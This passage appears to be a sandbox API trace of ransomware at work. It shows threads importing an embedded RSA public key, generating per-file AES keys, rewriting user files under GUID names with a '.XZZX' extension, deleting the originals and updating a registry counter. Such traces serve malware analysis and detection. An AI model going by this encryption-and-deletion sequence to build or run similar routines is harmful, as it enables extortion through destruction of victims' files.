dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0172.229] WriteFile (in: hFile=0xa28, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0172.229] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0172.229] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0172.229] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0xa34) returned 0x0 [0172.229] RegQueryValueExW (in: hKey=0xa34, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x10b, lpcbData=0x29adfdc*=0x4) returned 0x0 [0172.229] RegCloseKey (hKey=0xa34) returned 0x0 [0172.229] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0xa34) returned 0x0 [0172.230] RegSetValueExW (in: hKey=0xa34, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x10c, cbData=0x4 | out: lpData=0x29adfec*=0x10c) returned 0x0 [0172.230] RegCloseKey (hKey=0xa34) returned 0x0 [0172.230] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.230] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.230] CloseHandle (hObject=0xa28) returned 1 [0172.230] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0172.230] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0172.230] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8W8bO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\8w8bo.gif")) returned 1 [0172.231] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\8W8bO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\8w8bo.gif")) returned 0 Thread: id = 593 os_tid = 0x6b4 [0172.089] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.089] lstrcpyW (in: lpString1=0x2aaf460, lpString2="lTddMw6tEfsH.wav" | out: lpString1="lTddMw6tEfsH.wav") returned="lTddMw6tEfsH.wav" [0172.089] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0172.089] SetErrorMode (uMode=0x1) returned 0x1 [0172.089] lstrcpyW (in: lpString1=0x2aaf860, lpString2="lTddMw6tEfsH.wav" | out: lpString1="lTddMw6tEfsH.wav") returned="lTddMw6tEfsH.wav" [0172.089] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x9fb87666, Data2=0x70ca, Data3=0x438d, Data4=([0]=0x94, [1]=0x86, [2]=0xbc, [3]=0x6f, [4]=0xe1, [5]=0xee, [6]=0xa1, [7]=0x1e))) returned 0x0 [0172.089] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\lTddMw6tEfsH.wav") returned 102 [0172.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0172.089] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\BB5A0C7C1DC2FD429FB87666206DE18A.XZZX") returned 123 [0172.089] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="XZZX") returned 0x0 [0172.089] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\lTddMw6tEfsH.wav", dwFileAttributes=0x20) returned 1 [0172.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\lTddMw6tEfsH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\ltddmw6tefsh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa28 [0172.090] ReadFile (in: hFile=0xa28, lpBuffer=0x43d5378, nNumberOfBytesToRead=0x152e0, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x43d5378*, lpNumberOfBytesRead=0x2aae418*=0x152e0, lpOverlapped=0x0) returned 1 [0172.091] CloseHandle (hObject=0xa28) returned 1 [0172.091] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1cc0000 [0172.091] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cd0000 [0172.091] SetErrorMode (uMode=0x1) returned 0x1 [0172.091] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0172.091] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a63d8) returned 1 [0172.093] CryptGenKey (in: hProv=0x43a63d8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cdeb98) returned 1 [0172.306] CryptExportKey (in: hKey=0x3cdeb98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0172.307] CryptExportKey (in: hKey=0x3cdeb98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cd0000, pdwDataLen=0x2aae41c | out: pbData=0x1cd0000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0172.307] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0172.307] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0172.307] CryptDestroyKey (hKey=0x3cdeb98) returned 1 [0172.307] CryptReleaseContext (hProv=0x43a63d8, dwFlags=0x0) returned 0 [0172.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\BB5A0C7C1DC2FD429FB87666206DE18A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\bb5a0c7c1dc2fd429fb87666206de18a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa34 [0172.308] WriteFile (in: hFile=0xa34, lpBuffer=0x43d5378*, nNumberOfBytesToWrite=0x152e0, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43d5378*, lpNumberOfBytesWritten=0x2aae438*=0x152e0, lpOverlapped=0x0) returned 1 [0172.309] SetFilePointer (in: hFile=0xa34, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x152e0 [0172.309] WriteFile (in: hFile=0xa34, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0172.309] SetFilePointer (in: hFile=0xa34, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x152e5 [0172.309] WriteFile (in: hFile=0xa34, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x20, lpOverlapped=0x0) returned 1 [0172.309] SetFilePointer (in: hFile=0xa34, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15305 [0172.309] WriteFile (in: hFile=0xa34, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0172.309] SetFilePointer (in: hFile=0xa34, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1530a [0172.309] SetErrorMode (uMode=0x1) returned 0x1 [0172.309] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0172.309] OutputDebugStringW (lpOutputString="end") [0172.309] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.309] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0172.309] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x43a6570) returned 1 [0172.310] CryptImportPublicKeyInfo (in: hCryptProv=0x43a6570, dwCertEncodingType=0x1, pInfo=0x437eee8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437ef18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437ef20*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x3cdeb98) returned 1 [0172.310] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0172.310] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0172.310] CryptEncrypt (in: hKey=0x3cdeb98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0172.310] CryptEncrypt (in: hKey=0x3cdeb98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a65f8*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a65f8*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0172.310] WriteFile (in: hFile=0xa34, lpBuffer=0x43a65f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43a65f8*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0172.310] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0172.310] WriteFile (in: hFile=0xa34, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0172.311] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0172.311] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0172.311] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0xa38) returned 0x0 [0172.311] RegQueryValueExW (in: hKey=0xa38, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0x10c, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0172.311] RegCloseKey (hKey=0xa38) returned 0x0 [0172.311] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0xa38) returned 0x0 [0172.311] RegSetValueExW (in: hKey=0xa38, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0x10d, cbData=0x4 | out: lpData=0x2aadfec*=0x10d) returned 0x0 [0172.311] RegCloseKey (hKey=0xa38) returned 0x0 [0172.311] VirtualFree (lpAddress=0x1cc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.311] VirtualFree (lpAddress=0x1cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.312] CloseHandle (hObject=0xa34) returned 1 [0172.312] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0172.312] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0172.312] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\lTddMw6tEfsH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\ltddmw6tefsh.wav")) returned 1 [0172.313] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\lTddMw6tEfsH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\0zrcybt06wyn8r-glj0\\ltddmw6tefsh.wav")) returned 0 Thread: id = 594 os_tid = 0x474 [0172.276] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.276] lstrcpyW (in: lpString1=0x29af460, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0172.276] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.276] SetErrorMode (uMode=0x1) returned 0x1 [0172.276] lstrcpyW (in: lpString1=0x29af860, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0172.276] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xef1dd3a, Data2=0xbd9b, Data3=0x43d3, Data4=([0]=0x97, [1]=0x68, [2]=0xb1, [3]=0x8a, [4]=0xd8, [5]=0x9, [6]=0x57, [7]=0x95))) returned 0x0 [0172.276] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned 81 [0172.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0172.277] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9CC4C41E323BD7C10EF1DD3A34D6BC09.XZZX") returned 81 [0172.277] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 595 os_tid = 0x23c [0172.387] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.387] lstrcpyW (in: lpString1=0x29af460, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0172.387] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.387] SetErrorMode (uMode=0x1) returned 0x1 [0172.387] lstrcpyW (in: lpString1=0x29af860, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0172.387] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x917a5d06, Data2=0xa78d, Data3=0x401a, Data4=([0]=0x98, [1]=0xb, [2]=0x1f, [3]=0xac, [4]=0x2c, [5]=0xc3, [6]=0xa3, [7]=0xbc))) returned 0x0 [0172.387] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2FFB243E16646FF464F688111A91543C.XZZX") returned 81 [0172.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0172.387] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F314264E29F44452917A5D062C8F289A.XZZX") returned 81 [0172.387] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 596 os_tid = 0x53c [0172.542] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.542] lstrcpyW (in: lpString1=0x29af460, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0172.542] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.542] SetErrorMode (uMode=0x1) returned 0x1 [0172.542] lstrcpyW (in: lpString1=0x29af860, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0172.542] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xe3f44b73, Data2=0x2846, Data3=0x4183, Data4=([0]=0xb6, [1]=0x1c, [2]=0x84, [3]=0xa0, [4]=0x72, [5]=0x4f, [6]=0xb9, [7]=0x6))) returned 0x0 [0172.542] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned 81 [0172.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: 